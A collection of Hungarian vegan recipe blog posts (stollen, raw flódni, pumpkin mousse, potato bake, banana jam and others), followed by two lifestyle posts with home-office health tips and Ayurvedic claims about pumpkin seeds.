Az egyik legkedvesebb édességem. Sokáig vásároltuk is, de tavaly és idén is úgy döntöttem, mi készítjük el a gyerekekkel. Ebből az adagból 2 rúd lesz. Hozzávalók: 50 dkg liszt 3 dkg élesztő20 dkg olvasztott ráma10 dkg barnacukor3 csomag vaníliás cukor2,5 dl növényi tej - nálam most vaníliás mandulatej 1/2 citrom héjafahéj, szegfűszeg10 dkg olajos mag, felvágva30 dkg kandírozott, aszalt gyümölcsök vegyesen, szükség szerint felvágva20 dkg marcipánmassza (natúr) Elkészítés:Az aszalványokat/kandírozott gyümölcsöket (nálunk most ananász és papaya volt) rumaromába áztatjuk. A langyos növényi cukros tejben felfuttatjuk az élesztőt. Majd az olajos mag(ok) és aszalványok, kandírozott gyümölcsök kivételével a többi alapanyagból sima tésztát dagasztunk. Meleg helyen kb 40 percig kelesztjük. Utána a magokat, aszalványokat hozzáadva átgyúrjuk és újabb 40 percig kelesztjük. Ezután lisztezett felületen kinyújtjuk, közepére helyezzük a rúddá gyúrt marcipánt (én most csak az egyikbe tettem, másikba nem, a gyerekek nem szeretik). A tészta egyik felét ráhajtjuk a másikra, kicsit lenyomkodjuk. Sütőpapírral bélelt tepsibe tesszük, lefedve még 20 percet kelesztjük. Előmelegített sütőben kb. 50 perc alatt készre sütjük. Amikor elkészült, még forrón lekenjük olvasztott rámával, és megszórjuk jó vastagon porcukorral. Alufóliába csavarva akár 4-5 hétig is eláll. Nálunk mondjuk, 2-3 nap alatt elfogy :-D
Tofu-brokkoli konfúziós egytál
2021. december 20. Mindennapi ételeink
Nagyon szeretjük a marinált tofut, magában, pástétomnak vagy fasírtnak elkészítve, rántva, önmagában vagy szójaszósszal pirítva, bundázva, bárhogyan. Épp csak édességet nem készítek belőle (azt csak natúr tofuból) :-D És mivel a brokkoli is nagy kedvenc, ma párolt brokkolit, sült tofut locsoltunk meg vadas szósszal és ezúttal tészta helyett rizsre locsoltuk-pakoltuk mindezt. Próbáljátok ki. Hozzávalók:2 marinált tofukb 1 dl szójaszósz2-3 ek. balzsamecet2-3 ek. méz2 ek. olaj 1 fej brokkoli --1 ek.olaj 1 fej vöröshagyma3 sárgarépa1 fehérrépa1/4 zeller1/4 karalábé mustár, majoranna, só, vegeta, Dr Oetker vegatejföl, citrom --Rizs Elkészítés:A rizst elkészítjük. A brokkolit is rózsáira szedve feltesszük párolódni (ha szeretnénk, olajozott tepsiben süthetjük is). Amíg az fő, nagyjából a szószt is el tudjuk készíteni: egy ek olajon és ugyanannyi vízen megpároljuk a hagymát, és rákockázzuk a meghámozott zöldségeket. Kevés vizet öntünk rá, fűszerezzük. A mustárt és tejfölt később adjuk hozzá. Roppanósra főzzük, ekkor hozzákeverünk 1-2 ek. mustárt, és ugyanannyi tejfölt. Rusztikusra botmixerezzük. Már csak a tofu maradt hátra: felkockázzuk, és 2 ek. olaj felhasználásával egy serpenyőben megpirítjuk , kb félidőben adjuk hozzá a szójaszószt. igény szerint balzsamecetet, mézet. Ezzel hagyjuk tovább pirulni. Miután elkészültünk, mindent tálalunk (rizs, mellé halmozva a brokkolikat, majd a pirított tofut és az egészet nyakon öntjük a szósszal) .
Fenséges flódni
Vágyakozásom félelemmel keveredett, amikor korábban elhatároztam, kipróbálom a nyers flódnit. Nyerset, mármint csak növényi alapanyagokból, olyan változatban, ahol nem kell sütni, hanem nyersen elfogyasztható. Féltem, hogy az almalap (ami tulajdonképpen a flódni tésztájaként szolgál) nem fog összejönni és így nem sikerül elkészítenem. Ma már bátorítok mindenkit, próbálja ki, mert az almalap elkészítése roppant egyszerű - csak éppen időigényesebb az átlagosnál. Ezért ha karácsonyra ezt szeretnéd elkészíteni, már érdemes előkészíteni az almalapokat előre, így a kész almalapok nem romlanak meg hetekig, sőt hónapokig sem. Nem kell megijedni attól sem, hogy az elkészítése a leírás alapján időben sokáig tart. A legjobb dolog, hogy az almalapok aszalása ugyan hosszas órákat vesz igénybe, de nem kell ott lenni és óránként ellenőrizni. Emlészem egyik reggel elkészítettem az almaturmixot, elindítottam a sütős aszalást (lásd lentebb a leírást) és simán végigdolgoztam a 8 órát - első alkalommal home-office-ból, otthonról, második alkalommal pedig bementem az irodába és mire hazajöttem nagyjából kész lett az almalap. A harmadik alkalommal pedig éjszakára tettem rá.
A recept
Hozzávalók az almalaphoz:
- 5-6 db kimagozott alma (Nagy tepsire nézve 1 vagy 2 lap jön ki ebből a mennyiségből - attól függően, hogy milyen vastag lapot kívánunk készíteni. A vastagabbaknak több aszalási idő kell.)
- víz
- igény szerint banán, ha édesebbet kívánunk készíteni.
Az almákat turmixgép poharába daraboljuk és kevés vízzel sűrű masszát turmixolunk, majd aszalógép tálcájára kiterítjük, és megaszaljuk. Ha nincs aszalógép, se tálca hozzá, akkor egy tepsibe egy szilikonlapot fektetünk, arra öntjük rá a masszát, nyitott sütőt 50 fokra állítva hosszas órák alatt (8-10-12) megaszaljuk. Sajnos sütőpapírt nem ajánlhatok ehhez a művelethez, mert összeráncosodik és nem lesz sima az almalap.
Töltelékek:
1. Mákos töltelék:
- 1 csésze mák (beáztatva, megszárítva, megdarálva)
- 1/2 csésze datolya
- frissen facsart narancslé
A mákot néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt, megdarált mákot pedig összekeverjük a datolyaszósszal. Ha nem elég kenhető, túl száraz, akkor kevés narancslét kanalazunk hozzá. A mák áztatásával aktiváljuk a bennük rejlő fitinsavat, így a mákban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése.
2. Szilvás töltelék:
- 1.5 csésze aszalt szilva megáztatva
- 1/2 csésze mazsola, aszalt gyümölcsdarabok megáztatva
Az aszalt szilvát éppen csak addig áztatjuk, mig puha nem lesz, ha eleve puha aszalt szilvánk van, akkor nem szükséges áztatni. Ha áztatjuk, szűrjük le jól a levét, majd aprítógéppel összedaráljuk. Ugyanígy folytatjuk az eljárást az édesítésre szánt gyümölcsdarabokkal, majd a két szószt alaposan összekeverjük.
3. Diós töltelék:
- 1 csésze dió (beáztatva, megszárítva, megdarálva)
- 1/2 csésze datolya
- 1 bio citrom reszelt héja
A diót néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt majd megdarált diót pedig összekeverjük a datolyaszósszal. A dió áztatásával aktiváljuk a bennük rejlő fitinsavat, így a dióban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése.
A flódni összeállítása innen már egyszerű: az első gyümölcslapra rákenjük szélétől széléig a mákos tölteléket, majd erre ráhelyezünk egy újabb gyümölcslapot. Erre jön a szilvás töltelék, majd újra gyümölcslap amit a diós töltelékkel kenünk meg, majd a tetejére egy újabb gyümölcslap.
Néhány órát - ha van elég türelmünk még :) - egy éjszakát hűtőben pihentetjük, majd szeleteljük.
Vegetáriánus wellington
Hozzávalók: A tésztához:20 dkg liszt10 dkg vaj1,5 kk só 1/2 kk sütőpor A töltelékhez:1 db sárgarépa1 db édesburgonya30 dkg kelbimbó25 dkg főtt lencse2 kk só 1/2 kk őrölt fekete bors 1/2 kk aszafoetida (vagy fél evőkanál apróra vágott hagyma)1 ek mustár2 ek paradicsompüré 1/2 kk őrölt rozmaring 1/2 kk majoránna...
Sütőtök mousse vaníliás öntettel
Adj te is élményt karácsonyi ajándékba. :)
Ha szeretnél meglepni valakit egy főzőtanfolyammal , akkor foglald le gyorsan a helyet,
mert az év eleji dátumok nagyon gyorsan betelnek.
Dr. Greger után szabadon
Aki nem ismeri Dr. Michael Gregert, ő az Így ne halj meg c. könyv szerzője, a teljes értékű növényi étrend elkötelezett híve. Nagy tisztelője vagyok, és nagyon fontosnak tartom, amit csinál. Rengeteg orvosi tényekkel alátámasztott, mégis közérthető videót készített már számtalan témában, ami nagy segítségére van minden vegánnak.
Én most egy receptjét dolgoztam fel, és csak egy kicsit írtam át, mert nálunk ugye nem igazán lehet sütőtökpürét kapni, cserébe selyemtofut is alig, általában nincsen a spejzban óriás medzsúl datolya, csak jófajta Kalifás, és a pumpkin spice helyett is csak hagyományos illatos fűszereket találtam.
De ahogy a mondás tartja, nem kell elkeseredni.. (nincs is ilyen mondás). :))
Milyen érdekes, hogy eredetileg mennyire hasonló okból indítottam útjára a Kertkonyha oldalt 7 éve, amikor még alig tudtunk bármit is a vegán ételekről.
Volt pár kevéssé használható amerikai recept fura hozzávalókkal, én meg nekiláttam a kísérletezésnek, hogy helyi vegán alapanyagokból ételeket készítsek magamnak. Aztán tessék! Kiderült, hogy simán megoldható a dolog. ;)
Szóval, nem kell megijedni, csak a lenti összetevőkre kell koncentrálni!
Itt megnézhetitek az eredeti videóját: https://www.facebook.com/NutritionFacts.org/videos/625114521854507/
Hozzávalók három adaghoz (simán elég, nagyon kiadós!):
- 200 g kisütött sütőtök belseje
- 180 g natúr tofu
- 8-10 db magozott, áztatott datolya
- összesen 1/2 mk a következő őrölt fűszerekből: fahéj, gyömbér, szerecsendió, szegfűszeg
A vaníliás öntethez:
- 25 g (1 ek) kesudió beáztatva
- 1 kk porcukor (bocsánat, Dr. Greger, de ha datolyát teszek bele, nem marad szép fehér!)
- 1 mk vaníliás cukor (ezért is!)
- A mousse hozzávalóit egy késes aprítóban turmixold krémesre.
- Kanalazd tűzálló tálkákba, és 180 fokos előmelegített sütőben süsd 35-40 percet. Akkor jó, ha “megbőrösödött” a teteje.
- Amíg sül, készítsd el a vaníliás krémet. Ehhez először forró vízben ázzon fél órát a kesudió. Új vízzel, és annyival, ami épp ellepi, turmixold krémesre. Ízesítsd, édesítsd, ahogy jól esik. :) A végén dióval is megszórhatod a pohárkrémedet.
Jó étvágyat!
Elkészítési idő: 5 perc + sütés
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Sütőtök mousse vaníliás öntettel first appeared on Kertkonyha.
Vegán Pumpkin Spice Latte – egyszerű recept otthonra
Az ősz legnagyobb slágere a pumpkin spice latte, szinte minden kávézóban belefuthatsz ilyenkor. Fűszeres, hangulatos, meleg ital és valójában nem is nehéz elkészíteni. Ha szeretnéd otthon is kipróbálni a gazdaságosabb, etikusabb verzióját, ami garantáltan vegán is, olvass tovább! Hozzávalók: 2 adaghoz 3 evőkanál sütőtökpüré (lifehack, ha nem akarsz egy egész sütőtököt megpucolni és a megfőzésével-pürésítésével bajlódni, akkor vehetsz kis üveges sütőtökpürét, amit a bébiételek között találsz. én is ebből készítettem most) 2-3 evőkanál agaveszirup/juharszirup (én 3 evőkanál alnatura agaveszirupot használtam, így elég édes lett az eredmény. ha egyik sincs otthon, akkor kókuszcukorral is kiválthatod) fél teáskanál fahéj fél teáskanál őrölt gyömbér fél teáskanál őrölt szerecsendió fél teáskanál őrölt szegfűszeg (de ha van otthon mézeskalács fűszerkeveréked, az szinte pontosan ezeket tartalmazza, mehet belőle 2 teáskanállal a fentiek helyett) fél bögre növényi tej (én a dm-es barista tejet ajánlom (zabital szójával), nagyon jól habosítható és nincs erőteljes szójaíze sem, a többi növényi tejhez képest az ára is barátibb) 1-2 adag lefőzött presszókávé (én 1 adagot öntöttem csak bele, de ha több koffeinnel innád akkor mehet több is) díszítéshez növényi tejszínhab (én a felverhető Meggle Creme Patisserie Decor néven futó dobozos tejszínre esküszöm, de dm-ben kapható klasszikus flakonos növényi tejszínhab is) Egy kisebb lábosba beleöntöttem a sütőtökpürét, agaveszirupot és összemelegítettem (nem forraltam fel), jól elkevertem a masszát. Ezután mehet bele a növényi tej, a fűszerek és végül a kávé, kevergetve amíg fel nem melegszik az egész. Én kézi habverővel habosítottam kicsit rajta, mielőtt kitöltöttem volna a poharamba. A végén hozzáadtam a tejszínhabot és megszórtam őrölt szerecsendióval. Ennyi az egész, már ihatod is! Az alaprecept variálható attól függően, hogy mennyire szereted édesen/fűszeresen/sűrűn, kísérletezhetsz a szirup/fűszer/püré aránnyal ízlésed szerint. Tedd a kedveceim közé 0 The post Vegán Pumpkin Spice Latte – egyszerű recept otthonra appeared first on VegaNinja.
Angol rakott krumpli
2021. szeptember 24. Kertkonyha
Az elején jártam, még csak a szószt kóstolgattam a kanálról, de már elkezdtem azon agyalni, milyen legyen az ételfotó erről a rakott krumpliról. Mert muszáj, hogy szuper legyen! Őrült gusztusos legyen! Azért, hogy mindenki, aki csak látja, el akarja készíteni, mert ezt mindenkinek MEG KELL KÓSTOLNIA!
Ilyet mindenkinek ennie kell!
Legalább egyszer az életben. :)
Egyébként pofon egyszerű a recept, és alig kell hozzá edény.
Hozzávalók 2-3 adaghoz
- 500 g (3 nagy krumpli)
- 1 fej vöröshagyma
- 2 g fokhagyma
- 1 mk mustár
- 1/3 mk szárított kakukkfű
- 1/3 mk rozmaring
- 2 kk sörélesztőpehely
- 2 csapott ek liszt
- 4 dl édesítetlen növényi tej
- 1/2 kk só
- 3 ek olívaolaj
- Olajban pirítsd meg az apróra vágott vöröshagymát, és amikor majdnem kész, 1-2 percre add hozzá a reszelt/átnyomott fokhagymát is.
- Botturmixerrel a saját poharában keverd simára a tejjel a lisztet, a a fűszereket, és a mustárt és élesztőpelyhet, majd öntsd a hagymákhoz. Forrald fel állandó kevergetés mellett.
- Már csak az összeállítás hiányzik. :) Ehhez a krumplit hámoz meg, vágd fél cm vastag karikákra, és csinosan rendezgesd el az edényben. Öntsd rá a szószt, a tetejét szórd meg borssal.
- A sütőben fél órát süsd 180 fokon.
Jó étvágyat!
Elkészítési idő: 35 perc
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Angol rakott krumpli first appeared on Kertkonyha.
Márványos-meggyes piskóta (vegán)
Habár a meggy szezonja már vége, ezt a sütit elkészíthetjük fagyasztott vagy befőtt meggyből is. A lényeg, hogy a meggy magozott legyen. Édes ugyanakkor a gyümölcsnek köszönhetően enyhén savanykás élvezetet ad. Sok helyen potyogtatós néven ismerik, gondolom, mivel a meggyszemeket csak úgy rá kell potyogtatni. Gyorsan elkészül, nincs sok bajlódás vele, és igazán finom. A következő recept nagy tepsi adagját adja.
A recept
Hozzávalók:
Száraz hozzávalók:
- 20 dkg fehér liszt
- 12 dkg kukorica liszt
- 8 dkg teljes kiőrlésű liszt
- 20 dkg erithritol vagy gyümölcscukor vagy barna cukor vagy xylit
- 1,5 púpozott tk szódabikarbóna
- 1 foszfátmentes sütőpor (vagy Angliában kapható self-raising flour - ez esetben ezt használjuk lisztként és nem kell hozzá sütőpor)
- 2 ek kakaó vagy karobpor (végén adjuk hozzá)
Nedves hozzávalók:
- 4 dl növényi tej
- 10 dkg olaj
- 2 tk vanília ( lehet vanília aroma is)
- 2 ek citrusféle (nekem mandarin volt otthon, de citrom vagy narancs is megfelel)
A sütemény tetejére:
50 dkg magozott meggy
Elkészítés:
A liszteket egy tálba szitáljuk majd a többi száraz hozzávalókat hozzákeverjük. Ha nincs kukorica és teljes kiőrlésű liszt, nem kell aggódni, sima fehér lisztet is használhatunk, ez esetben összesen 40 dkg fehér lisztet használjunk, értelemszerűen. (A sárga szín elérése kedvéért egy csipet kurkumát/turmericet vagy esetleg sáfrányt adhatunk hozzá kukorica liszt hiányában.) A nedves hozzávalókat egy másik tálban (én mérődedényben kevertem el a folyékony hozzávalókat) összekeverjük, majd hozzáöntjük a száraz hozzávalókhoz és csomómentesre, sima állagúra keverjük. Kettéválasztjuk és az egyikhez hozzászitálunk 2 ek kakaó vagy karobport.
Az így kapott masszákatt egy sütőpapírral bélelt tepsibe öntjük. Először az egyiket, majd a másikat. Kés vagy inkább villa segítségével márványosra mintázzuk a barna és sárga masszát. A tetején elhelyezzük a meggyet. Ha nagyon savanykás gyümölcsöt használunk, akkor lehet érdemes egy kis édesítővel (eritritol és/vagy társai) megszórni, mielőtt a gyümölcsöt a massza tetejére tesszük. Ha fagyasztott gyümölcsöt használunk, akkor mindenképpen érdemes a gyümölcsöt kiolvasztani, különben sütés közben a kiolvadó gyümölcslé eláztatja a piskótát. 180 fokra előmelegített sütőben 30-40 perc alatt megsütjük. Szúrópróbával ellenőrizzük, hogy megsült-e a piskóta, olyan helyen szúrjuk bele, ami a közepén van és nem gyümölcs.
Tálaláskor megszórhatjuk egy kis "porcukorral" - nálam ez kávédarálóban porrá őrölt gyümölcscukor volt.
Csokis tortácska (nyers, vegán édesség)
A hőmérő most már tartósan 35 fok felett tombol, és a lakásban kb. minden fél fok számít, szóval, ma pont jól jön egy nyers édesség, amihez nem szükségeltetik semmiféle melegítő berendezés. :) További szuper tulajdonsága, hogy hozzávalói közül a tofu, a datolya, a zab is hűtő hatású a szervezetre.
Ami kell hozzá, az egy késes aprító, pár kerek fóliával bélelt forma, és 5-10 percecske.
Látjátok, én most több kisebb formákba tettem, de egyetlen nagy tortaformában is működik pl. szülinapra, csak akkor vegyetek mindenből minimum dupla mennyiséget.
Hozzávalók négy adaghoz:
Az aljához:
- 40 g dió
- 40 g datolya
- 20 g zabliszt
- 1 cs só
A csokikrém részhez:
- 150 g tofu
- 25 g étcsokoládé
- 2 ek kakaópor
- 2 ek nádporcukor
- 1 kk vaníliás cukor
- 1 csipet só
- A süti aljához turmixold össze a hozzávalókat késés aprítóban. A datolya szárazságától függően kelleni fog bele 1-2 evőkanálnyi víz. Akkor jó az állaga, ha összeáll gombóccá és elkezd “körbetáncolni” az edényben.
- Kisebb formákat bélelj ki folpackkal, és ennek az aljára nyomkodd le a masszát.
- Ezután ugyanabban az aprítóban habosítsd össze a krém hozzávalóit. Fontos, hogy a csokoládét olvaszd meg (lehet forró vízfürdőben pl.), így csurgasd a többihez.
- A krémet kend a sütiformákba, majd tedd a hűtőbe szilárdulni pár órát. Ezután a tortácskát emeld ki a formából, és fejtsd le róla a fóliát. Tálaláskor díszítheted gyümölccsel a tetejét.
Extra tipp : másnap még finomabb! :)
Jó étvágyat!
Elkészítési idő: 10 perc
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Csokis tortácska (nyers, vegán édesség) first appeared on Kertkonyha.
Csokis banándzsem (vegán)
Körülbelül 20-22 évvel ezelőtt ettem életemben először banán lekvárt, banándzsemet. Az évvégi napokat töltöttem barátok között és reggelire kovásztalan kenyér és banánlekvár is volt az asztalon. Ezt követően pár évre, amikor már férjnél voltam, főztem banánlekvárt. Most pedig egy kicsit változtattam rajta. Kaptunk egy csomó túlérett banánt, legalább 2-3 kilónyit, gyorsan kellett felhasználni, hogy ne romoljon meg még jobban, úgyhogy először is felfőztem őket, majd adtam hozzá kakaót, jól átkevertem, majd vízgőzben kifertőtlenített üvegecskékbe töltöttem. Kentük sütemény tetejére, linzerbe, és még mindig van belőle. Az egyik leggyorsabban elkészíthető lekvár ráadásul nem kell más hozzá mint banán és kakaó/karob vagy csoki. Cukrot sem kell hozzáadni, hiszen a banán az egyik legédesebb gyümölcs. Dzsemfix és társai sem kell hozzá, mert a banánnak köszönhetően sűrű lekvárt, dzsemet kapunk rövid főzési idővel.
A recept
Hozzávalók:
- Kb 15-20 szál túlérett banán
- víz
- kakaópor/karobpor vagy aprított csokoládé
- üvegek
Elkészítés:
A túlérett banánokat megfosztjuk héjuktól, majd egy tűzálló edénybe belekarikázzuk. Kevés kis vizet (kb 1 dl) öntünk a lábos aljára, majd állandó kevergetés mellett összefőzzük. Botturmix géppel érdemes pépesíteni, ezzel lerövidítjük a főzés idejét. Amikor a banánok már szétfőttek, pépes, sűrű szószunk van, hozzáadunk tetszés szerint kakaó- vagy karobport vagy apróra tört csokidarabokat. (Használhatunk húsvét vagy karácsony után megmaradt csokit is akár.)
Az üvegeket a dzsemhez a lekvárfőzés előtt érdemes elkészíteni. Ennél a receptemnél részletesen leírom a menetét.
Tejszínes gombás, fehérboros spagetti
Ha szeretnéd, akár házi vegán főzőtejszínnel
Nem nehéz betenni a spejzba egy doboz növényi tejszínt, ezt aláírom. Viszont előfordulhat, hogy már felhasználtad a tartalékot, amikor egy ilyen tésztára vágysz, nem? Ha még vannak kétségeid afelől, hogy nekikezd-e a házi verziónak, megsúgom, hogy a magtejszín finomabb szokott lenni, mint a dobozos változatok. Tisztább is, adalék- és tartósítószerek sincsenek benne. Próbáld ki mindenképpen!
>>> Ha magad készíted a tejszínt, akkor először ennek kezdj neki. Enyhén szólva nem bonyolult, hiszen a napraforgómagot egyszerűen be kell áztatni és aztán krémesre turmixolni. Használj forró vizet, és fél órát hagyd benne a magokat. Ennyi idő alatt fel fog puhulni annyira, hogy teljesen krémesre tudd turmixolni. Használj új vizet, kb. annyit, amennyi ellepi, és egy botmixer 2 perc alatt elvégzi neked, amit kell. Savanyítsd citromlével és ne maradjon ki egy csipet édes íz sem. Arra figyelj, hogy a vizet óvatosan adagold hozzá, mert kivenni már nem tudod. Persze nem nagy gond ha kicsit híg, mert egyszerűen lefőzöd majd a levét.
Viszont ha tényleg túl sok a víz, akkor sajnos előfordulhat, hogy nem lesz krémes a tejszíned, csak pörögnek majd a vízben a magok.
És akkor most jöjjön a tészta receptje, amihez a bio gombát a Chefgomba biztosította.
Hozzávalók 2-3 adag szószhoz:
- 300 g gomba
- 100 ml növényi tejszín VAGY: 50 g napraforgómag +1 kk citromlé +1 csipet cukor
- 100 ml száraz fehérbor
- 1 ek friss rozmaring (vagy a fele szárítva)
- 1 gerezd fokhagym
- 1 mk só
- bors
- 5 ek olívaolaj
- A gombát olajon pirítsd sóval és borssal, majd 10 percig kevergesd, amíg a leve elfő.
- Ezután locsold meg fehérborral. Ízesítsd a lereszelt fokhagymával, és keverd hozzá a tejszínt is.
- Hagyd rotyogni, amíg besűrűsödik.
- Ennyi! Közben azért főzz tésztát is magadnak. ;)
Jó étvágyat!
Elkészítési idő: kb. 25 perc
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
Nézd meg a Kertkonyha főzőtanfolyamokat!
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
The post Tejszínes gombás, fehérboros spagetti first appeared on Kertkonyha.
Almás mandulás golyók (nyers, vegán, gluténmentes)
Az alma gyümölcscentrifugálása után maradt almarostot használtam fel ehhez az édességhez, de reszelt almával is szuperül működik, csak érdemes a lereszelt alma levét kinyomkodni, hogy valamelyest szárazabb legyen, az almapép, amivel dolgozunk. Az alma levét pedig akár meg is ihatjuk. A golyók ízét pedig bió narancs reszelt héjával vagy narancsból kifacsart cseppekkel tehetjük még ízletesebbé. Most hogy közeledik a húsvét elkészíthetjük ezt gyorsan a vendégeknek vagy kis ajándékként is adhatjuk valamilyen díszes dobozban. Nálunk 4-5 napig kitartott hűtőben nem lett semmi baja. (Próbáltuk beosztani.)
A recept
Hozzávalók:
4 db alma
1 jó marék mandula
1/2 bió narancs héja
pár csepp narancs
Elkészítés:
A lereszelt almákból kinyomkodjuk a lét. Ez történhet szűrőn keresztül vagy kezünket használva. Ha gyümölcscentrifugálás után nyertünk almapépet, akkor már ezt nem szükséges elvégezni.
Mandulát őrölünk, a narancs héját lereszeljük. Ezt a hármat összekeverjük olyan állagúra, amiből már golyókat tudunk formálni. Őrölt mandulába hempergetjük.
Én nem édesítettem semmivel, mert az alma édes volt, de ha szükséges adhatunk hozzá őrölt datolyát vagy mazsolát, esetleg valamilyen szirupot, mint datolya szirup, vagy akik fogyasztanak, azok mézet.
Sokat ülsz gép előtt? - tanácsok home office idejére
2021. március 15. Élj harmóniában
Kedvesek:) Az online órákon sokszor elmondom, hogy ez az egész nap gép előtt ülés, a görnyedés, monitor bámulás, online meetingekkel kifejezetten káros az emberi szervezetre nézve - nem csak a mozgásszervrendszeredre, de a belső szervek állapotára, hormonrendszeredre, légzésedre és emésztésedre, de elvonja a pránát ( életenergiát). Fáradtságot, kimerültséget, koncentrációzavart, fásultságot okozhat. Az online órákon sok tanácsot és gyakrolatot adtam eddig is nektek, amivel tudjátok kompenzálni ennek a homeoffice-nak a kedvezőtlen hatásait, de most párat összegyűjtöttem ebbe a postba. A mai bejegyzésemet ez a cikk inspirálta, az első hivatalos kutatás a zoom meetingekről cikk a telex oldaláról: https://telex.hu/tudomany/2021/03/13/zoom-faradtsag-stanford-kutatas-kieges-videohivas Mit tudsz tenni? - Reggel kelj fel, zuhanyozz, - lányok smink is:) - öltözz, reggelizz és menj el munkába... sétálj pár háztömbnyit a környéken - Ne ülj folyamatosan... - Rendszeresen állj fel, nyújtózzkodj, mozgasd át magad.... akár a jógamatrac kiterítve ott lehet a szobában és a szünetekben végezz olyan gyakorlatokat, amivel kompenzálhatod az ülést, a klaviatúra nyomkodást, egerezést és a monitorbámulást - Ha lehet dolgozz állva, szerezz be álló íróasztalt, pl. ha megbeszélés van állítsd úgy a kamerád, hogy állj és ne lássák hogy közben akár a testsúlyt egyik lábadról helyezed a másikra. - Délben menj el ebédelni ... sétálj az otthonod környékén ebéd után Este menj haza munkából.... sétálj pár háztömbnyit a környéken Ha laptopon dolgozol tegyél hozzá monitort, egeret, klaviatúrát. Figyeld a tartásod.... ne dolgozz kanapéba süppedve, koynhaasztalra görnyedve, dohányzóasztalnál és mindenféle nyakatekert pozícióban, Ne bámuld a monitort folyamatosan... Amikor csak teheted nézz el a monitorod felett, nézz ki az ablakon, Tarts olyan időszakokat amikor behunyod a szemed és pihenteted Az ájurvéda szerint a kék ég nézése, pihenteti a szemet, javítja a látást Amit lehet inkább telefonon intézd el, mint videóhívással Amit tudsz papíron olvasni pl. könyvet inkább vedd le a polcról és ne a monitoron olvasd Amikor nem kell gép előtt ülnöd ne tedd... ne ragadj ott és ne ülj át a tv elé se:)... sétálj, kirándulj, tölts időt a családtagokkal, társasjátékozzatok, beszélgessetek, mozogj otthon, tornázz, jógázz, főzz magatokra, selejtezz, rakj rendet, olvass... csak ne ülj a gép előtt:) Ha fáradt vagy kerüld a mesterséges stimulánsokat (kv, üdítők, édességek)... tarts szünetet, mozgasd át a tested, relaxálj, meditálj Rendszeresen szellőztess Próbálj természetes fényben lenni Tarts a szobában zöldnövényeket Menj természetbe amennyit csak tudsz, akár egy parkba, de ha van rá lehetőséged akkor valamilyen erdős részre:) Az óvintézkedéseket betartva mozdulj ki otthonról, találkozz másokkal, menj emberek közé Szabadulj meg a feszültségektől! Relaxálj, jógázz, meditálj. Relaxációról bővebben itt olvashatsz Egy plusz téma... sokaktól hallom, hogy sokat híztak amióta tart a karantén... ennek okai a kevés mozgás és a túl sok evés. Kerüld a nassolást, csipegetést, tarts mértéket és mozogj többet:) A jóga segít az önkontroll fejlesztésében és a szorongások leküzdésében is - sokaknak utóbbi húzódik emg a túlevés hátterében. Gonolkodj pozitívan és lásd mindennek a jó részét. :) A home office legnagyobb előnyei - kialakíthatsz magadnak egy ideális, egészséget támogató napirendet és életmódot - munka közben bármikor fel tudsz állni és bármilyen jóga vagy tornagyakorlatot elvégezhetsz - Belekezdhetsz az egészséges táplálkozásba - Otthon friss ételeket tudsz főzni a családodnak - Több minőségi időt tölthetsz a családoddal Csodás tavaszi napokat kívánok:) szeretettel Kati #homoffice #homework #otthonimunka #éljharmóniában #egészségmegőrzés #munkaotthonról #zoommeeting
A tökmag hatásai
2021. március 4. Élj harmóniában
A tél végén, tavasz elején a kapha-s (párás, vizes, nyálkás) időszakban, az egyik legjobb magféle amit fogyaszthatsz a tökmag. A tökmag antioxidáns, gazdag ásványi anyagokban és vitaminokban (vas, magnézium, cink, foszfor, mangán, réz, E-vitamin) , tartalmaz zsírokat és fehérjét is. A tökmag az ájruvéda szempontjából édes, melegítő hatású. Legjobb a kapha-nak, de vata és pitta esetén is alkalmazható. Erősíti, javítja az emésztést és jó vérképző is. Ugyan olajos mag, de az olajos magok, diófélék közül egy nagyon könnyen emészthető fajta. Ideáis csemege fogyni vágyoknak, mert jól csillapítja az éhséget, továbbá szabályozza a vércukorszintet. Vízhajtó hatása is ismert. Segít kitisztítani a vesét, húgyutakat és megakadályozza a felesleges vízvisszatartást. Antimikrobiális, azaz olyan szer, amely megöli a mikroorganizmusokat vagy gátolja azok növekedését. (például antibakteriális, gomba és vírus ellenes). Féregölő hatása miatt is előszeretettel használják évezredek óta a keleti gyógyászatokban. Általánosan növeli a férfiasságot. Modern kutatások hasznosnak tartják a prosztatarák megelőzésében is. Felhasználása változatos édesen és sósan is elkészíthető. Készíthetsz belőle tökmagkrémet (receptet itt találod). Én szeretem simán pirítva magában vagy összetett szénhidrátot tartalmazó ételekkel szuper teljes értékű fehérjeforrás (pl tésztához, rizshez, hajdinához, etc.). Szórhatod saláták tetejére vagy sós pogácsákba, rágcsálnivalókba is teheted. Elkészítheted pörkölve sóval, fűszerekkel vagy édesen is. A magfélék emésztését nem csak pirítással tudod megkönnyíteni, de áztatással is. Pl. este áztass be 1-2 ek. tökmagot és a reggelidhez fogyaszthatod is:) Vegyszermentes (bio) 